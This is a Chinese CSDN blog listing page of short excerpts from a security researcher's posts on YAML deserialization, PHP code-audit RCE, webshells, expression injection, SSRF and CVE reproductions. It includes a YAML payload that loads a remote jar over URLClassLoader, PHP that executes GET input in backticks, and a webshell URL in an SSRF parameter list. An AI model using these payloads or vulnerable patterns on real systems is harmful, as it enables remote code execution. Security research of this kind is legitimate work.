自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(42)
  • 资源 (4)
  • 收藏
  • 关注

原创 yaml反序列化

Yaml反序列化payloads1:!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:7800/yaml-payload.jar"] ]]]payloads2:​ 绕过 !! 的限制,如下: !可以用 tag:yaml.org,2002 表示。!<tag:yaml.org,2002:javax.script.Scri

2020-11-23 00:05:02 2288 1

原创 PHP代码审计

PHP代码审计RCE反引号中包括变量<?php$varch = $_GET['hi'];$output = `$varch`;echo "<pre>$output</pre>";?>array_map()中包含变量作用是为数组的每个元素应用回调函数 。其返回值为数组,是为 array1 每个元素应用 callback函数之后的数组。 callback 函数形参的数量和传给 array_map() 数组数量,两者必须一样。<?php$arra

2020-11-23 00:02:06 600

原创 404 WebshellDemo

404 webshell Demopackage controller;import org.springframework.stereotype.Controller;import org.springframework.web.bind.annotation.RequestMapping;import javax.servlet.http.HttpServletRequest;i...

2020-09-28 11:30:14 296

原创 java-web安全——RandomAccessFile 和 FileSystemProvider文件读写

package com.his;import java.io.ByteArrayOutputStream;import java.io.File;import java.io.IOException;import java.io.RandomAccessFile;import java.nio.file.Files;import java.nio.file.Path;import ...

2020-04-25 22:02:03 497

原创 liferay CVE-2020-7961 漏洞回显

liferay CVE-2020-7961 漏洞回显import com.liferay.portal.kernel.security.access.control.AccessControlUtil;import com.liferay.portal.kernel.security.auth.AccessControlContext;import javax.servlet.http.H...

2020-04-22 17:32:04 1797

原创 idea搜索 matches limit

idea搜索 matches limit 默认显示100,可通过如下限制,增加搜索返回内容help ——> find Action ——> 输入 Registry ——> 找到 ide.usages.page.size ,修改

2020-04-21 08:49:19 477

原创 EBS远程调试

EBS远程调试/u01/install/APPS/inst/apps/EBSDB_ebs/ora/10.1.3/opmn/conf/opmn.xml

2020-04-21 08:29:50 188

原创 Fel表达式注入

Fel表达式注入命令执行Demopackage com.his;import com.greenpineyu.fel.Expression;import com.greenpineyu.fel.FelEngine;import com.greenpineyu.fel.FelEngineImpl;import com.greenpineyu.fel.context.FelContext;...

2020-03-31 22:05:42 1559

原创 SSRF for DNSLOG

SSRF for DNSLOG#encoding=gbkimport urllib2import threadingimport Queueimport jsonimport sysimport osimport relock = threading.Lock()header = {"Content-type": "application/x-www-form-urlencod...

2019-01-13 00:14:30 1206

原创 URL中与SSRF相关的字段

URL中与SSRF相关的字段 relativePath url site path message=[img]http://myserver/wshell.php?logo.jpg[/img] query src src_url sr id vtTopicId //ebs operator(weblogic:SearchPublicRegistries) inputFi...

2019-01-12 00:03:50 447

转载 与浏览器交互

与浏览器交互# -*-coding:utf-8 -*-import randomimport reimport time# 图片转换import base64from bs4 import BeautifulSoupimport PIL.Image as imagefrom selenium import webdriverfrom selenium.webdriver i...

2019-01-02 22:26:00 570

原创 批量获取URL对应的IP

批量获取URL对应的IP#codeing:utf-8import urllibimport reimport sysimport osimport socketimport threadingimport Queueimport csvTHREAD_NUM = 20def readUrl(file): urllist = list() if os.pa...

2018-12-31 05:23:41 1305

原创 python学习 - 下载网页内所有的图片

下载网页内所有的图片#codeing:utf-8import urllibimport reimport sysimport osurl = 'http://tieba.baidu.com/p/1753935195'# with open('F:\hack\python\python_project\html\htmlpage.html', 'w') as f:# f...

2018-12-31 02:42:10 1862

原创 python学习 - 抓取网页内所有的URL

抓取网页内所有的URL#codeing:utf-8import urllibimport reimport sysimport osprint u'please enter the target url:',url = raw_input()if url: passelse: url = 'http://tieba.baidu.com/p/1753935195...

2018-12-31 02:41:04 945

原创 收集子域名

https://github.com/michenriksen/aquatone

2018-10-28 23:26:15 278

原创 Fiddler抓包Android 模拟器应用

第一次测试安卓应用,环境不允许使用真机,于是在电脑上安装了个安卓模拟器测试安卓应用,在抓包的时候遇到了点儿问题,网上的资料都是配置模拟器里面的wifi,但效果不理想,总是失败,后面找到了一个别的方式,可以抓浏览器以及应用的流量,所以记录一下。官网下载android Studio, 安装AVD(Android Virtual Device Manager)花了一点时间,主要是网速慢,下载时间长。...

2018-08-24 16:46:58 2030

原创 S2-057 本地复现

下午正不慌不忙测着我的安卓应用呢,突然爆了个Struts2漏洞,心里咯噔一下,不会吧,上个月工作汇报还在吹水Struts2在升级OGNL后,很难由于不正当OGNL解析造成任意命令执行了。原文见:https://blog.csdn.net/u013224189/article/details/81091874怀着不安的心情,看了下漏洞信息,踏马的,还真是这个地方。Struts2 7月份升级...

2018-08-23 14:36:30 2490

原创 下一个方向,移动安全?

又有一段时间没有更新博客了,自从接触工作项目,倒是把时间都投入到了工作上面。这本是不错的状态,可最近我发现,我在挑自己熟悉的事情做,比如web渗透,虽然每周能找出一些问题,但技术上没有什么长进,都是用的“老路子”,让人可怕的是,我习惯了这种“老路子”。在目前的公司里,只会一种技能在一个领域是远远不够的,如果我要突出,就必须扩展或者突破,而不能享受这种“轻松”,正好公司提倡全面发展,那么我除了w...

2018-08-20 20:19:57 342

原创 CVE-2018-2894 weblogic 任意文件上传漏洞复现

CVE-2018-2894 weblogic任意文件上传漏洞2018年7月19日,CNCERT发出漏洞预警,weblogic存在远程代码执行高危漏洞,本质上为任意文件上传漏洞,有两处上传点:/ws_utc/config.do/ws_utc/begin.do影响版本:10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。 漏洞作者就是我的小基友,所以我 来尝试复...

2018-07-25 19:43:22 3625

原创 OGNL表达式注入漏洞要成为过去了吗?

起因Struts2今年来爆出一系列安全漏洞,以至于在官方release页面,还专门罗列了各个版本对应的CVE漏洞,也算是一大奇观。![struts_release](https://img-blog.csdn.net/20180716180339458?watermark/2/text/aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3UwMTMyMjQxODk=/font/5a6...

2018-07-18 08:55:08 8599

原创 微信支付SDK XXE漏洞 验证复现

今天公司收到漏洞预警,微信支付SDK存在XXE漏洞,下载到本地验证了一下漏洞信息来源http://seclists.org/fulldisclosure/2018/Jul/3https://xz.aliyun.com/t/2426漏洞描述微信支持提供了一个接口,供商家接收异步支付结果,微信支付所用的java sdk在处理结果时可能触发一个XXE漏洞,攻击者可以向这...

2018-07-03 18:08:08 12216

原创 小白上路_spring-security-oauth2 RCE复现分析

小白上路_spring-security-oauth2 RCE复现分析首先高兴的宣布,CVE-2018-1260这个漏洞复现成功,弹出了windows可爱的计算器然后就狠狠的抽自己一巴掌,讲述一下自己怎么把它折腾出来的。关于CVE-2018-1260一个标准的由于spring将不可信数据当作SPEL表达式直接解析导致的RCE漏洞影响范围Spring Securit...

2018-06-29 14:15:25 1113

原创 欢迎使用CSDN-markdown编辑器

缥缈最近为房子的事儿烦闷,可能只有CSDN这个地方能让我自由的吐出我的心声吧。 为了生活与工作能够很好的结合,我们选择定居在广州这个地方,唯一一个房价不恐怖的一线城市,不过这个“不恐怖”只是相对来说。于我而言,真的是一座横亘在面前的大山。我的父母皆来自农村,虽然很早就借着改革的风潮“下海”打工,不过淳朴的他们始终未能在沿海站稳脚跟。为了我和姐姐的学习,他们每个月省吃俭用,把存下来的钱寄给在家乡上学

2016-08-24 11:15:02 372

原创 “一日游”

最近因为工作经常上演一日游,这个过程真的很痛苦。基本上都是今天从北京去某地,第二天从某地回北京。一天中可能12个小时在路上,8个小时在酒店,还有4个小时在客户现场。   昨天在机场和小伙伴谈起买房、结婚,一肚子的负能量相互发泄,真过瘾。爽归爽,抛开绝望,生活还是得继续。把所有的不甘和委屈都化为动力,共勉。

2016-01-22 09:58:08 455

原创 崩溃的公司网络

CSDN有选择性的屏蔽了公司网络,忧桑。     最近这两个月很惆怅,几乎每周都出差,身体累倒是其次,主要是觉得时间都浪费在路途了。   马上就过春节了,希望本周出差后可以好好休息,认真迎接久违的春节。

2016-01-18 17:16:18 501

原创 普天同庆

公司终于可以访问CSDN了,继续发表!

2015-12-21 09:17:58 421

转载 摘抄——OWASP_Code_Review_Guide-V1_1 (1)

web安全之不信任的数据来源

2015-11-13 09:28:38 834

原创 XML文件的解析以及XML外部实体注入防护

XML外部实体注入 (XXE防护)

2015-11-10 18:41:16 37011 4

原创 Web安全之语法知识补习

Web安全,不可信数据源及缺陷可能发生的位置

2015-11-03 18:45:50 863

原创 CSDN markdown 常用快捷键

快捷键加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl + Q 插入链接 Ctrl + L 插入代码 Ctrl + K 插入图片 Ctrl + G 提升标题 Ctrl + H 有序列表 Ctrl + O 无序列表 Ctrl + U 横线 Ctrl + R 撤销 Ctrl + Z 重做 Ctrl + YMarkdown目录 [toc]

2015-11-02 18:23:00 452

转载 [转]Web安全之JSP详解

web安全知识之JSP语法详解

2015-11-02 18:05:49 829

原创 Web安全之C#语法学习

ASP.NET Web安全知识

2015-11-02 16:30:24 1643

转载 web应用想要达到完全的线程安全,需要注意哪些地方?

web应用想要达到完全的线程安全,需要注意哪些地方?关注web安全知识,正好搜到一个前辈在帖子下的答复,现记录下来,希望可以在日后用到:

2015-11-01 21:53:44 1361

原创 OWASP ZAP上手体验

新领到一个任务,试下OWASP ZAP。工具说明         ZAproxy是一个易于使用交互式的用于web应用程序漏洞挖掘的渗透测试工具,可以检测sql注入,跨站脚本,跨站请求伪造以及路径遍历等问题。 下载地址https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project 工具说明

2015-10-30 17:53:20 29949 1

原创 既然换上了代码安全的马甲,那就为自己加油呐喊一下吧

从事源代码静态分析一段时间了,不满足只会用工具发现问题,希望能对工具找出的问题提出自己的见解。知识在于积累。        不积跬步无以至千里,从今天起,我要坚持分享每一天的进步。

2015-10-29 18:37:47 444

转载 windows下利用eclipse开发jenkins插件

1,开发插件,开发环境需安装Maven和JDK 6.0以上版本2,

2014-08-05 17:47:05 921

转载 linux shell脚本中打开另一个终端并在新终端中执行shell脚本

gnome-terminal -t "title-name" -x bash -c "sh ./run.sh;exec bash;"-t 为打开终端的标题,便于区分。-x 后面的为要在打开的终端中执行的脚本,根据需要自己修改就行了。最后的exec bash;是让打开的终端在执行完脚本后不关闭。

2014-07-30 13:48:46 20209 1

转载 Public key for *.rpm is not installed

http://blog.sina.com.cn/s/blog_716844910100qf8t.html

2014-07-09 11:57:24 559

原创 QT移动无边框窗口

设计中遇到一个http://www.xuebuyuan.com/1899289.html

2014-04-28 00:03:51 655

原创 mysql5.1数据库升级

工作需要,这次将软件工具中自带的组件mysql5.1升级到mysql5.6.按照官网提示,升级分成了两步进行。 http://dev.mysql。com/doc/refman/5.1/en/upgrading.html         1 , 从mysql5.1升级到 mysql5.52 , 从mysql5.5升级到 mysql5.6.因为是mysql是工具中带的组件,这次我选用的

2014-04-24 14:01:20 656

yaml反序化漏洞本地环境复现

yaml反序化漏洞本地环境复现 CTF 比赛中yaml反序劣化payloads有个!!的限制,当时没搞出来,事后大神透露需要借助tag, 于是就有了这个资源文件

2020-11-23

felDemo.rar

FEL表达式注入demo样例 FelEngine.instance.eval("$('org.apache.commons.lang.StringUtils').isEmpty('123')");

2020-03-31

springMVCDemo.rar

springmvcDemo EL表达式注入 ExpressionParser parser = new SpelExpressionParser();

2020-03-30

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除